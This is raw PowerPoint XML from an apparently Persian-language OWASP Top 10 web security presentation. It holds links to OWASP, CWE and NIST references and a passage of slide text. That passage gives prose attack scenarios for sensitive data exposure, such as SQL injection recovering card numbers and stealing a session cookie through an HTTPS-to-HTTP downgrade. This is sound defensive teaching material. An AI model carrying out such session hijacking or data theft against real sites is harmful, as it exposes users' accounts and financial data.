      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3914817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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1624128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101787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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3446620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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184705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XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/611.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home"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www.owasp.org/index.php/XML_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.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SVS_V19_Configuration" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/388.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Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/16.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.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src.nist.gov/publications/detail/sp/800-123/final" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.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aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubysec.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/Map_Application_Architecture_(OTG-INFO-010)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/retirejs/retire.js/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V1_Architecture" TargetMode="External"/><Relationship Id="rId9"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cwe.mitre.org/data/definitions/223.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId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www.owasp.org/index.php/Logging_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#8:_Implement_Logging_and_Intrusion_Detection" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html"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8.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId30"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9.xml"/><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slide" Target="slide25.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hyperlink" Target="https://www.autodesk.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/top10" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/issues"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hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" TargetMode="Externa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s>
</file>

<file path=ppt/slides/_rels/slide6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/isoiec-27001-information-security.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=49168"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hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator"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asd.gov.au/infosec/mitigationstrategies.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework"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Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="(https:/portswigger.net/kb/issues/00101080_serversidetemplateinjection)" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00101080_serversidetemplateinjection" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V5_Input_validation_and_output_encoding" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.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www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Application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Testing_for_authentication" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_Identity_Management" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.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www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://&#160;Authentication" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#5:_Implement_Identity_and_Authentication_Controls" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_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108822" y="9243000"/>
            <a:ext cx="1080000" cy="259200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1828800"/>
            <a:ext cx="6019800" cy="923330"/>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pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>10 ریسک امنیتی بسیار بحرانی برنامه‌های کاربردی تحت وب</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935032" y="9356656"/>
            <a:ext cx="4389568" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR"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عمومی</a:t>
            </a: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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نمونه‌ سناریوهای حمله</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یک برنامه رمزنگاری شماره کارت اعتباری را در یک پایگاه داده با استفاده از رمزگذاری خودکار پایگاه داده رمز می کند. با این حال، هنگامی فراخوانی، این داده ها به طور خودکار رمزگشایی می شود، و به یک نقص تزریق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> اجازه می هد شماره کارت اعتباری را در حالت متن آشکار بازیابی کند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یک سایت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را برای تمام صفحاتش استفاده نمی کند و یا از رمزنگاری ضعیف پشتیبانی می کند. مهاجم ترافیک شبکه را مانیتور می‎‌کند (به عنوان مثال در یک شبکه بی سیم ناامن)، اتصالات را از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTTPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> به    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> کاهش می‌دهد،</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>در‌خواستها بین کاربر اصلی و سرور را قطع می کند و کوکی نشست کاربر را سرقت می کند. مهاجم پس از آن از این کوکی استفاده می کند و نشست کاربر (احراز هویت شده) را دزدیده، به داده های شخصی کاربر دسترسی پیدا میکند یا آنها را تغییر می دهد. مهاجم به جای موارد بالا می توانند تمام داده های منتقل شده مانند دریافت کننده انتقال مالی را تغییر دهد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پایگاه داده رمز عبور از هش های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
